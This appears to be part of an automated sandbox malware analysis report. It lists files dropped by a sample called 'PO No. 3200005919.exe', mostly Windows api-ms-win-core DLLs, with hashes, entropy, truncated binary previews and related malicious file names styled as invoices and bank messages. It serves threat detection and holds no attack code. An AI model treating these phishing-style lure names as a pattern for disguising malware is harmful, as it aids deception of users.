                                              gunzipped.exeGet hashmaliciousBrowse
                                                PO110859600.jsGet hashmaliciousBrowse
                                                  cH9kNQjk7C.jarGet hashmaliciousBrowse
                                                    PO-11085960.jsGet hashmaliciousBrowse
                                                      879-5160.jsGet hashmaliciousBrowse
                                                        Orderlist.jarGet hashmaliciousBrowse
                                                          e-dekont.pdf.exeGet hashmaliciousBrowse
                                                            Dekont.exeGet hashmaliciousBrowse
                                                              e-dekont.pdf.exeGet hashmaliciousBrowse
                                                                Purchase Order-#17001396.exeGet hashmaliciousBrowse
                                                                  Ziraat Bankasi Swift Mesaji.exeGet hashmaliciousBrowse
                                                                    Process:C:\Users\user\Desktop\PO No. 3200005919.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3036000, page size 2048, file counter 3, database pages 22, 1st free page 7, free pages 2, cookie 0x10, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):45056
                                                                    Entropy (8bit):0.7853305971874845
                                                                    Encrypted:false
                                                                    SSDEEP:48:43b/DVIIgyZKLk8s8LKvUf9K4UKTgyJqhtcebVEq8Ma0D0HOlcjlGxdKmtAONu41:Sb+uKLyeym/grcebn8MouOjlGxdKmt3N
                                                                    MD5:00C036C61F625BF9D25362B9BE24ADEB
                                                                    SHA1:6738C3D037E4A2E9F41B1398BA88E5771532F593
                                                                    SHA-256:0C187B091E99E5BB665C59F8F8E027D5658904B32E4196D2EB402F3B1CAD69EF
                                                                    SHA-512:711265BC8C1653BF6E862343BF3149A2AB09F4BA7D38E2D8A437001DB6C0F1936F6362571DD577CD7BDBEEC766DF141CB7E0681512C12E25A99CDB71731232D1
                                                                    Malicious:false
                                                                    Reputation:moderate, very likely benign file
                                                                    Preview:SQLite format 3......@ ..........................................................................S`....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Users\user\Desktop\PO No. 3200005919.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):18744
                                                                    Entropy (8bit):7.080160932980843
                                                                    Encrypted:false
                                                                    SSDEEP:192:3jBMWIghWGZiKedXe123Ouo+Uggs/nGfe4pBjS/uBmWh0txKdmVWQ4GWDZoiyqnP:GWPhWVXYi00GftpBjSemTltcwpS
                                                                    MD5:502263C56F931DF8440D7FD2FA7B7C00
                                                                    SHA1:523A3D7C3F4491E67FC710575D8E23314DB2C1A2
                                                                    SHA-256:94A5DF1227818EDBFD0D5091C6A48F86B4117C38550343F780C604EEE1CD6231
                                                                    SHA-512:633EFAB26CDED9C3A5E144B81CBBD3B6ADF265134C37D88CFD5F49BB18C345B2FC3A08BA4BBC917B6F64013E275239026829BA08962E94115E94204A47B80221
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Joe Sandbox View:
                                                                    • Filename: Swift Mesaj#U0131#09971.exe, Detection: malicious, Browse
                                                                    • Filename: E-DEKONT.exe, Detection: malicious, Browse
                                                                    • Filename: VAN66789.exe, Detection: malicious, Browse
                                                                    • Filename: e555fe3baa7d282f00cdaccf6ce2820d9fdc6556f8f24.exe, Detection: malicious, Browse
                                                                    • Filename: MhQTqiCvm1.exe, Detection: malicious, Browse
                                                                    • Filename: PROFORMA-418340-2022.exe, Detection: malicious, Browse
                                                                    • Filename: SecuriteInfo.com.NSIS.InjectorX-gen.6534.4411.exe, Detection: malicious, Browse
                                                                    • Filename: SecuriteInfo.com.Win32.BotX-gen.30874.3243.exe, Detection: malicious, Browse
                                                                    • Filename: Fedex No71502.exe, Detection: malicious, Browse
                                                                    • Filename: gunzipped.exe, Detection: malicious, Browse
                                                                    • Filename: PO110859600.js, Detection: malicious, Browse
                                                                    • Filename: cH9kNQjk7C.jar, Detection: malicious, Browse
                                                                    • Filename: PO-11085960.js, Detection: malicious, Browse
                                                                    • Filename: 879-5160.js, Detection: malicious, Browse
                                                                    • Filename: Orderlist.jar, Detection: malicious, Browse
                                                                    • Filename: e-dekont.pdf.exe, Detection: malicious, Browse
                                                                    • Filename: Dekont.exe, Detection: malicious, Browse
                                                                    • Filename: e-dekont.pdf.exe, Detection: malicious, Browse
                                                                    • Filename: Purchase Order-#17001396.exe, Detection: malicious, Browse
                                                                    • Filename: Ziraat Bankasi Swift Mesaji.exe, Detection: malicious, Browse
                                                                    Reputation:high, very likely benign file
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....."............!......................... ...............................0.......J....@.............................+............ ..................8=..............T............................................................................text...+........................... ..`.rsrc........ ......................@..@......".........;...T...T.........".........d.................".....................RSDSMB...5.G.8.'.d.....api-ms-win-core-console-l1-1-0.pdb..........T....rdata..T........rdata$zzzdbg.......+....edata... ..`....rsrc$01....` .......rsrc$02......................".....................(...`...............,...W...................G...o...............................D...s...............5...b...............................................api-ms-win-core-console-l1-1-0.dll.AllocConsole.kern
                                                                    Process:C:\Users\user\Desktop\PO No. 3200005919.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):18232
                                                                    Entropy (8bit):7.093995452106596
                                                                    Encrypted:false
                                                                    SSDEEP:192:RWIghWG4U9xluZo123Ouo+Uggs/nGfe4pBjSbMDPxVWh0txKdmVWQ4CWrDry6qnZ:RWPhWFv0i00GftpBjBHem6plUG+zIw
                                                                    MD5:CB978304B79EF53962408C611DFB20F5
                                                                    SHA1:ECA42F7754FB0017E86D50D507674981F80BC0B9
                                                                    SHA-256:90FAE0E7C3644A6754833C42B0AC39B6F23859F9A7CF4B6C8624820F59B9DAD3
                                                                    SHA-512:369798CD3F37FBAE311B6299DA67D19707D8F770CF46A8D12D5A6C1F25F85FC959AC5B5926BC68112FA9EB62B402E8B495B9E44F44F8949D7D648EA7C572CF8C
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...A..............!......................... ...............................0.......#....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@....A...........<...T...T.......A...........d...............A.......................RSDS...W,X.l..o....4....api-ms-win-core-datetime-l1-1-0.pdb.........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02....................A.......P...............(...8...H...................t.......................api-ms-win-core-datetime-l1-1-0.dll.GetDateFormatA.kernel32.GetDateFormatA.GetDateFormatW.kernel32.GetDateFormatW.GetTimeFormatA.kernel32.GetTimeFormatA
                                                                    Process:C:\Users\user\Desktop\PO No. 3200005919.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):18232
                                                                    Entropy (8bit):7.1028816880814265
                                                                    Encrypted:false
                                                                    SSDEEP:384:cWPhWM4Ri00GftpBj2YILemtclD16PaEC:l10oiBQe/L
                                                                    MD5:88FF191FD8648099592ED28EE6C442A5
                                                                    SHA1:6A4F818B53606A5602C609EC343974C2103BC9CC
                                                                    SHA-256:C310CC91464C9431AB0902A561AF947FA5C973925FF70482D3DE017ED3F73B7D
                                                                    SHA-512:942AE86550D4A4886DAC909898621DAB18512C20F3D694A8AD444220AEAD76FA88C481DF39F93C7074DBBC31C3B4DAF97099CFED86C2A0AAA4B63190A4B307FD
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L..................!......................... ...............................0......GF....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@................9...T...T...................d.......................................RSDS.j..v..C...B..h....api-ms-win-core-debug-l1-1-0.pdb............T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02............................P...............(...8...H...|...............q.......................api-ms-win-core-debug-l1-1-0.dll.DebugBreak.kernel32.DebugBreak.IsDebuggerPresent.kernel32.IsDebuggerPresent.OutputDebugStringA.kernel32.OutputDebugStri
                                                                    Process:C:\Users\user\Desktop\PO No. 3200005919.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):18232
                                                                    Entropy (8bit):7.126358371711227
                                                                    Encrypted:false
                                                                    SSDEEP:192:NFmxD3PWIghWGJY/luZo123Ouo+Uggs/nGfe4pBjSffcp8Wh0txKdmVWQ4yWRzOr:NFkWPhW60i00GftpBj4emHlD16Pa7v
                                                                    MD5:6D778E83F74A4C7FE4C077DC279F6867
                                                                    SHA1:F5D9CF848F79A57F690DA9841C209B4837C2E6C3
                                                                    SHA-256:A97DCCA76CDB12E985DFF71040815F28508C655AB2B073512E386DD63F4DA325
                                                                    SHA-512:02EF01583A265532D3970B7D520728AA9B68F2B7C309EE66BD2B38BAF473EF662C9D7A223ACF2DA722587429DA6E4FBC0496253BA5C41E214BEA240CE824E8A2
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...\x.............!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@....\x..........A...T...T.......\x..........d...............\x......................RSDS.1....U45.z.d.....api-ms-win-core-errorhandling-l1-1-0.pdb............T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02............\x......n...............(...D...`...................4...f.......................'...J.....................api-ms-win-core-errorhandling-l1-1-0.dll.GetErrorMode.kernel32.GetErrorMode.GetLastError.kernel32.GetLastError.RaiseExcept
                                                                    Process:C:\Users\user\Desktop\PO No. 3200005919.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):21816
                                                                    Entropy (8bit):7.014255619395433
                                                                    Encrypted:false
                                                                    SSDEEP:384:d6PvVXHWPhWnsnhi00GftpBjaJemyDlD16PamW8:UPvVX85nhoisJeLt8
                                                                    MD5:94AE25C7A5497CA0BE6882A00644CA64
                                                                    SHA1:F7AC28BBC47E46485025A51EEB6C304B70CEE215
                                                                    SHA-256:7EA06B7050F9EA2BCC12AF34374BDF1173646D4E5EBF66AD690B37F4DF5F3D4E
                                                                    SHA-512:83E570B79111706742D0684FC16207AE87A78FA7FFEF58B40AA50A6B9A2C2F77FE023AF732EF577FB7CD2666E33FFAF0E427F41CA04075D83E0F6A52A177C2B0
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.................!.........................0...............................@......./....@..........................................0..................8=..............T............................................................................text............................... ..`.rsrc........0......................@..@...............8...T...T..................d......................................RSDS.0...B..8....G....api-ms-win-core-file-l1-1-0.pdb.........T....rdata..T........rdata$zzzdbg............edata...0..`....rsrc$01....`0.......rsrc$02.......................K...K.......D...p...6...`.......................?...l...............A...................6..._...................;...e............... ...I...n...............-...d...................*...g...............*...U...................M...
                                                                    Process:C:\Users\user\Desktop\PO No. 3200005919.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):18232
                                                                    Entropy (8bit):7.112057846012794
                                                                    Encrypted:false
                                                                    SSDEEP:192:IWIghWGJnWdsNtL/123Ouo+Uggs/nGfe4pBjSfcD63QXWh0txKdmVWQ4yW1rwqnh:IWPhWlsnhi00GftpBjnem9lD16PamFP
                                                                    MD5:E2F648AE40D234A3892E1455B4DBBE05
                                                                    SHA1:D9D750E828B629CFB7B402A3442947545D8D781B
                                                                    SHA-256:C8C499B012D0D63B7AFC8B4CA42D6D996B2FCF2E8B5F94CACFBEC9E6F33E8A03
                                                                    SHA-512:18D4E7A804813D9376427E12DAA444167129277E5FF30502A0FA29A96884BF902B43A5F0E6841EA1582981971843A4F7F928F8AECAC693904AB20CA40EE4E954
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...._.L...........!......................... ...............................0............@.............................L............ ..................8=..............T............................................................................text...<........................... ..`.rsrc........ ......................@..@....._.L........8...T...T........_.L........d................_.L....................RSDS........g"Y........api-ms-win-core-file-l1-2-0.pdb.........T....rdata..T........rdata$zzzdbg.......L....edata... ..`....rsrc$01....` .......rsrc$02........._.L....@...................(...8...l...............`.......................api-ms-win-core-file-l1-2-0.dll.CreateFile2.kernel32.CreateFile2.GetTempPathW.kernel32.GetTempPathW.GetVolumeNameForVolumeMountPointW.kernel32.GetVolumeNameForVolumeMou
                                                                    Process:C:\Users\user\Desktop\PO No. 3200005919.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):18232
                                                                    Entropy (8bit):7.166618249693435
                                                                    Encrypted:false
                                                                    SSDEEP:192:BZwWIghWG4U9ydsNtL/123Ouo+Uggs/nGfe4pBjSbUGHvNWh0txKdmVWQ4CWVU9h:UWPhWFBsnhi00GftpBjKvxemPlP55QQ7
                                                                    MD5:E479444BDD4AE4577FD32314A68F5D28
                                                                    SHA1:77EDF9509A252E886D4DA388BF9C9294D95498EB
                                                                    SHA-256:C85DC081B1964B77D289AAC43CC64746E7B141D036F248A731601EB98F827719
                                                                    SHA-512:2AFAB302FE0F7476A4254714575D77B584CD2DC5330B9B25B852CD71267CDA365D280F9AA8D544D4687DC388A2614A51C0418864C41AD389E1E847D81C3AB744
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...4..|...........!......................... ...............................0......t.....@.......................................... ..................8=..............T............................................................................text...}........................... ..`.rsrc........ ......................@..@....4..|........8...T...T.......4..|........d...............4..|....................RSDS.=.Co.P..Gd./%P....api-ms-win-core-file-l2-1-0.pdb.........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02........4..|........................D...p...............#...P...................;...g...................<...m...............%...Z.........................api-ms-win-core-file-l2-1-0.dll.CopyFile2.kernel32.CopyFile2.CopyFileExW.kernel32.CopyFileExW.Crea
                                                                    Process:C:\Users\user\Desktop\PO No. 3200005919.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):18232
                                                                    Entropy (8bit):7.1117101479630005
                                                                    Encrypted:false
                                                                    SSDEEP:384:AWPhWXDz6i00GftpBj5FrFaemx+lDbNh/6:hroidkeppp
                                                                    MD5:6DB54065B33861967B491DD1C8FD8595
                                                                    SHA1:ED0938BBC0E2A863859AAD64606B8FC4C69B810A
                                                                    SHA-256:945CC64EE04B1964C1F9FCDC3124DD83973D332F5CFB696CDF128CA5C4CBD0E5
                                                                    SHA-512:AA6F0BCB760D449A3A82AED67CA0F7FB747CBB82E627210F377AF74E0B43A45BA660E9E3FE1AD4CBD2B46B1127108EC4A96C5CF9DE1BDEC36E993D0657A615B6
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....G...........!......................... ...............................0......V.....@............................._............ ..................8=..............T............................................................................text..._........................... ..`.rsrc........ ......................@..@......G........:...T...T.........G........d.................G....................RSDSQ..{...IS].0.> ....api-ms-win-core-handle-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg......._....edata... ..`....rsrc$01....` .......rsrc$02......................G....Z...............(...<...P...................A...|...............,.............api-ms-win-core-handle-l1-1-0.dll.CloseHandle.kernel32.CloseHandle.CompareObjectHandles.kernel32.CompareObjectHandles.DuplicateHandle.kernel32
                                                                    Process:C:\Users\user\Desktop\PO No. 3200005919.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):18232
                                                                    Entropy (8bit):7.174986589968396
                                                                    Encrypted:false
                                                                    SSDEEP:192:GElqWIghWGZi5edXe123Ouo+Uggs/nGfe4pBjS/PHyRWh0txKdmVWQ4GWC2w4Dj3:GElqWPhWCXYi00GftpBjP9emYXlDbNs
                                                                    MD5:2EA3901D7B50BF6071EC8732371B821C
                                                                    SHA1:E7BE926F0F7D842271F7EDC7A4989544F4477DA7
                                                                    SHA-256:44F6DF4280C8ECC9C6E609B1A4BFEE041332D337D84679CFE0D6678CE8F2998A
                                                                    SHA-512:6BFFAC8E157A913C5660CD2FABD503C09B47D25F9C220DCE8615255C9524E4896EDF76FE2C2CC8BDEF58D9E736F5514A53C8E33D8325476C5F605C2421F15C7D
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....:............!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@......:.........8...T...T.........:.........d.................:.....................RSDS.K....OB;....X......api-ms-win-core-heap-l1-1-0.pdb.........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02..........:.........................X...............2...Q...q.......................C...h...........................(...E...f.......................0..._...z...............................................api-ms-win-core-heap-l1-1-0.dll.GetProcessHeap.k
                                                                    Process:C:\Users\user\Desktop\PO No. 3200005919.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):17856
                                                                    Entropy (8bit):7.076803035880586
                                                                    Encrypted:false
                                                                    SSDEEP:192:DtiYsFWWIghWGQtu7B123Ouo+Uggs/nGfe4pBjSPiZadcbWh0txKdmVWQ4mWf2FN:5iYsFWWPhWUTi00GftpBjremUBNlgC
                                                                    MD5:D97A1CB141C6806F0101A5ED2673A63D
                                                                    SHA1:D31A84C1499A9128A8F0EFEA4230FCFA6C9579BE
                                                                    SHA-256:DECCD75FC3FC2BB31338B6FE26DEFFBD7914C6CD6A907E76FD4931B7D141718C
                                                                    SHA-512:0E3202041DEF9D2278416B7826C61621DCED6DEE8269507CE5783C193771F6B26D47FEB0700BBE937D8AFF9F7489890B5263D63203B5BA99E0B4099A5699C620
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....$.............!......................... ...............................0...........@.......................................... ...................9..............T............................................................................text............................... ..`.rsrc........ ......................@..@.....$..........?...T...T........$..........d................$......................RSDS#.......,.S.6.~j....api-ms-win-core-interlocked-l1-1-0.pdb..........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.................$......................(...T...............L...............!...U...................1.......p...............@...s.................................api-ms-win-core-interlocked-l1-1-0.dll.InitializeSListHead.kernel32.InitializeSLis
                                                                    Process:C:\Users\user\Desktop\PO No. 3200005919.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):18744
                                                                    Entropy (8bit):7.131154779640255
                                                                    Encrypted:false
                                                                    SSDEEP:384:yHvuBL3BmWPhWZTi00GftpBjNKnemenyAlvN9W/L:yWBL3BXYoinKne1yd
                                                                    MD5:D0873E21721D04E20B6FFB038ACCF2F1
                                                                    SHA1:9E39E505D80D67B347B19A349A1532746C1F7F88
                                                                    SHA-256:BB25CCF8694D1FCFCE85A7159DCF6985FDB54728D29B021CB3D14242F65909CE
                                                                    SHA-512:4B7F2AD9EAD6489E1EA0704CF5F1B1579BAF1061B193D54CC6201FFDDA890A8C8FACB23091DFD851DD70D7922E0C7E95416F623C48EC25137DDD66E32DF9A637
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....u*l...........!......................... ...............................0......9.....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.....u*l........A...T...T........u*l........d................u*l....................RSDSU..e.j.(.wD.......api-ms-win-core-libraryloader-l1-1-0.pdb............T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.............u*l....................(...p...........R...}...............*...Y...................8..._.......................B...k...................F...u...............)...P...w...................................................api-ms-win-c
                                                                    Process:C:\Users\user\Desktop\PO No. 3200005919.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):20792
                                                                    Entropy (8bit):7.089032314841867
                                                                    Encrypted:false
                                                                    SSDEEP:384:KOMw3zdp3bwjGjue9/0jCRrndbVWPhWIDz6i00GftpBj6cemjlD16Pa+4r:KOMwBprwjGjue9/0jCRrndbCOoireqv
                                                                    MD5:EFF11130BFE0D9C90C0026BF2FB219AE
                                                                    SHA1:CF4C89A6E46090D3D8FEEB9EB697AEA8A26E4088
                                                                    SHA-256:03AD57C24FF2CF895B5F533F0ECBD10266FD8634C6B9053CC9CB33B814AD5D97
                                                                    SHA-512:8133FB9F6B92F498413DB3140A80D6624A705F80D9C7AE627DFD48ADEB8C5305A61351BF27BBF02B4D3961F9943E26C55C2A66976251BB61EF1537BC8C212ADD
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...S.v............!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@....S.v.........@...T...T.......S.v.........d...............S.v.....................RSDS..pS...Z4Yr.E@......api-ms-win-core-localization-l1-2-0.pdb.........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02................S.v.....v.......;...;...(.......................<...f.......................5...]...................!...I...q...................N.............../...j.............../...^.................../...\...................8...`...........
                                                                    Process:C:\Users\user\Desktop\PO No. 3200005919.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):18744
                                                                    Entropy (8bit):7.101895292899441
                                                                    Encrypted:false
                                                                    SSDEEP:384:+bZWPhWUsnhi00GftpBjwBemQlD16Par7:b4nhoi6BedH
                                                                    MD5:D500D9E24F33933956DF0E26F087FD91
                                                                    SHA1:6C537678AB6CFD6F3EA0DC0F5ABEFD1C4924F0C0
                                                                    SHA-256:BB33A9E906A5863043753C44F6F8165AFE4D5EDB7E55EFA4C7E6E1ED90778ECA
                                                                    SHA-512:C89023EB98BF29ADEEBFBCB570427B6DF301DE3D27FF7F4F0A098949F987F7C192E23695888A73F1A2019F1AF06F2135F919F6C606A07C8FA9F07C00C64A34B5
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....%(...........!......................... ...............................0............@.............................l............ ..................8=..............T............................................................................text...l........................... ..`.rsrc........ ......................@..@......%(........:...T...T.........%(........d.................%(....................RSDS.~....%.T.....CO....api-ms-win-core-memory-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg.......l....edata... ..`....rsrc$01....` .......rsrc$02......................%(....................(...h...........)...P...w...................C...g...................%...P...........B...g...................4...[...|...................=...................................api-ms-win-core-memory-l1-1-0.dl
                                                                    Process:C:\Users\user\Desktop\PO No. 3200005919.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):18232
                                                                    Entropy (8bit):7.16337963516533
                                                                    Encrypted:false
                                                                    SSDEEP:192:pgWIghWGZiBeS123Ouo+Uggs/nGfe4pBjS/fE/hWh0txKdmVWQ4GWoxYyqnaj/6B:iWPhWUEi00GftpBj1temnltcwWB
                                                                    MD5:6F6796D1278670CCE6E2D85199623E27
                                                                    SHA1:8AA2155C3D3D5AA23F56CD0BC507255FC953CCC3
                                                                    SHA-256:C4F60F911068AB6D7F578D449BA7B5B9969F08FC683FD0CE8E2705BBF061F507
                                                                    SHA-512:6E7B134CA930BB33D2822677F31ECA1CB6C1DFF55211296324D2EA9EBDC7C01338F07D22A10C5C5E1179F14B1B5A4E3B0BAFB1C8D39FCF1107C57F9EAF063A7B
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L... ..............!......................... ...............................0.......-....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.... ...........=...T...T....... ...........d............... .......................RSDS...IK..XM.&......api-ms-win-core-namedpipe-l1-1-0.pdb............T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02................ .......................(...P...x...............:...w...............O...y...............&...W...............=...j.......................api-ms-win-core-namedpipe-l1-1-0.dll.ConnectNamedPipe.kernel32.ConnectNamedPipe.CreateNamedP
                                                                    Process:C:\Users\user\Desktop\PO No. 3200005919.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):19248
                                                                    Entropy (8bit):7.073730829887072
                                                                    Encrypted:false
                                                                    SSDEEP:192:wXjWIghWGd4dsNtL/123Ouo+Uggs/nGfe4pBjSXcYddWh0txKdmVWQ4SW04engo5:MjWPhWHsnhi00GftpBjW7emOj5l1z6hP
                                                                    MD5:5F73A814936C8E7E4A2DFD68876143C8
                                                                    SHA1:D960016C4F553E461AFB5B06B039A15D2E76135E
                                                                    SHA-256:96898930FFB338DA45497BE019AE1ADCD63C5851141169D3023E53CE4C7A483E
                                                                    SHA-512:77987906A9D248448FA23DB2A634869B47AE3EC81EA383A74634A8C09244C674ECF9AADCDE298E5996CAFBB8522EDE78D08AAA270FD43C66BEDE24115CDBDFED
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...).r............!......................... ...............................0.......:....@.............................G............ ..................0=..............T............................................................................text...G........................... ..`.rsrc........ ......................@..@....).r.........F...T...T.......).r.........d...............).r.....................RSDS.6..~x.......'......api-ms-win-core-processenvironment-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg.......G....edata... ..`....rsrc$01....` .......rsrc$02........).r.....................(...|.......B...............$...M...{...............P...................6...k.............../...(...e...............=...f...............8...q...............!...T............... ...........................
                                                                    Process:C:\Users\user\Desktop\PO No. 3200005919.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):19392
                                                                    Entropy (8bit):7.082421046253008
                                                                    Encrypted:false
                                                                    SSDEEP:384:afk1JzNcKSIJWPhW2snhi00GftpBjZqcLvemr4PlgC:RcKST+nhoi/BbeGv
                                                                    MD5:A2D7D7711F9C0E3E065B2929FF342666
                                                                    SHA1:A17B1F36E73B82EF9BFB831058F187535A550EB8
                                                                    SHA-256:9DAB884071B1F7D7A167F9BEC94BA2BEE875E3365603FA29B31DE286C6A97A1D
                                                                    SHA-512:D436B2192C4392A041E20506B2DFB593FE5797F1FDC2CDEB2D7958832C4C0A9E00D3AEA6AA1737D8A9773817FEADF47EE826A6B05FD75AB0BDAE984895C2C4EF
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L..................!......................... ...............................0......l.....@.......................................... ...................9..............T............................................................................text............................... ..`.rsrc........ ......................@..@................B...T...T...................d.......................................RSDS..t........=j.......api-ms-win-core-processthreads-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02............................1...1...(...........K...x...............,...`...................C...q...............'...N...y..............."...I...{...............B...p...............,...c...............H...x...................9...S...p.......
                                                                    Process:C:\Users\user\Desktop\PO No. 3200005919.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):18744
                                                                    Entropy (8bit):7.1156948849491055
                                                                    Encrypted:false
                                                                    SSDEEP:384:xzADfIeRWPhWKEi00GftpBjj1emMVlvN0M:xzfeWeoi11ep
                                                                    MD5:D0289835D97D103BAD0DD7B9637538A1
